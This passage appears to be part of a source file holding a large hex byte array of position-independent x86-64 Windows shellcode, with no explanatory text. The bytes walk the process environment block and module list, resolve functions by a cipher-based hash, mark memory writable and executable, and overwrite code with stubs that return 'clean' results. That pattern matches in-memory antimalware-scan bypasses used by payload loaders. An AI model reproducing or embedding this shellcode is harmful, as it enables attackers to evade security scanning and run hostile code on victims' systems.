1087 | 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f, | |
1088 | 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00, | |
1089 | 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, | |
1090 | 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86, | |
1091 | 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, | |
1092 | 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, | |
1093 | 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, | |
1094 | 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, | |
1095 | 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b, | |
1096 | 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, | |
1097 | 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85, | |
1098 | 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, | |
1099 | 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, | |
1100 | 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76, | |
1101 | 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, | |
1102 | 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01, | |
1103 | 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c, | |
1104 | 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6, | |
1105 | 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, | |
1106 | 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01, | |
1107 | 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01, | |
1108 | 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
1109 | 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, | |
1110 | 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc, | |
1111 | 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00, | |
1112 | 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, | |
1113 | 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, | |
1114 | 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85, | |
1115 | 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85, | |
1116 | 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20, | |
1117 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, | |
1118 | 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b, | |
1119 | 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55, | |
1120 | 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
1121 | 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01, | |
1122 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, | |
1123 | 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd, | |
1124 | 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01, | |
1125 | 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85, | |
1126 | 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d, | |
1127 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, | |
1128 | 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45, | |
1129 | 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00, | |
1130 | 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, | |
1131 | 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
1132 | 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48, | |
1133 | 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45, | |
1134 | 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55, | |
1135 | 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, | |
1136 | 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, | |
1137 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, | |
1138 | 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48, | |
1139 | 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, | |
1140 | 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, | |
1141 | 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, | |
1142 | 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, | |
1143 | 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, | |
1144 | 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3, | |
1145 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
1146 | 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30, | |
1147 | 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, | |
1148 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, | |
1149 | 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
1150 | 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, | |
1151 | 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, | |
1152 | 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45, | |
1153 | 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, | |
1154 | 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
1155 | 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00, | |
1156 | 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, | |
1157 | 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
1158 | 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48, | |
1159 | 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0, | |
1160 | 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00, | |
1161 | 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, | |
1162 | 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, | |
1163 | 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, | |
1164 | 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
1165 | 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, | |
1166 | 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, | |
1167 | 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
1168 | 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, | |
1169 | 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
1170 | 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00, | |
1171 | 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, | |
1172 | 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
1173 | 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48, | |
1174 | 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0, | |
1175 | 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00, | |
1176 | 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
1177 | 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, | |
1178 | 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, | |
1179 | 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55, | |
1180 | 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d, | |
1181 | 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48, | |
1182 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, | |
1183 | 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, | |
1184 | 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55, | |
1185 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, | |
1186 | 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7, | |
1187 | 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, | |
1188 | 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45, | |
1189 | 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
1190 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00, | |
1191 | 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, | |
1192 | 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3, | |
1193 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, | |
1194 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, | |
1195 | 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, | |
1196 | 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, | |
1197 | 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
1198 | 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, | |
1199 | 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, | |
1200 | 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, | |
1201 | 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff, | |
1202 | 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, | |
1203 | 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, | |
1204 | 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, | |
1205 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, | |
1206 | 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, | |
1207 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, | |
1208 | 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, | |
1209 | 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff, | |
1210 | 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, | |
1211 | 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, | |
1212 | 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, | |
1213 | 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, | |
1214 | 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, | |
1215 | 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, | |
1216 | 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe, | |
1217 | 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, | |
1218 | 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, | |
1219 | 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, | |
1220 | 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, | |
1221 | 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, | |
1222 | 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, | |
1223 | 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, | |
1224 | 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00, | |
1225 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, | |
1226 | 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, | |
1227 | 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, | |
1228 | 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, | |
1229 | 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, | |
1230 | 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, | |
1231 | 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, | |
1232 | 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50, | |
1233 | 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b, | |
1234 | 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
1235 | 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
1236 | 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, | |
1237 | 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b, | |
1238 | 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48, | |
1239 | 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45, | |
1240 | 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, | |
1241 | 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, | |
1242 | 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89, | |
1243 | 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b, | |
1244 | 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f, | |
1245 | 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00, | |
1246 | 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48, | |
1247 | 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff, | |
1248 | 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16, | |
1249 | 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30, | |
1250 | 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e, | |
1251 | 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, | |
1252 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, | |
1253 | 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, | |
1254 | 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, | |
1255 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, | |
1256 | 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, | |
1257 | 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b, | |
1258 | 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2, | |
1259 | 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1, | |
1260 | 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc, | |
1261 | 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08, | |
1262 | 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45, | |
1263 | 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec, | |
1264 | 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b, | |
1265 | 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, | |
1266 | 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d, | |
1267 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, | |
1268 | 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, | |
1269 | 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0, | |
1270 | 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7, | |
1271 | 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b, | |
1272 | 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, | |
1273 | 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10, | |
1274 | 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0, | |
1275 | 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, | |
1276 | 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45, | |
1277 | 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b, | |
1278 | 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, | |
1279 | 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0, | |
1280 | 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, | |
1281 | 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0, | |
1282 | 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83, | |
1283 | 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, | |
1284 | 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88, | |
1285 | 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83, | |
1286 | 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, | |
1287 | 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, | |
1288 | 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00, | |
1289 | 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, | |
1290 | 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, | |
1291 | 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, | |
1292 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, | |
1293 | 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, | |
1294 | 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc, | |
1295 | 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, | |
1296 | 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00, | |
1297 | 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b, | |
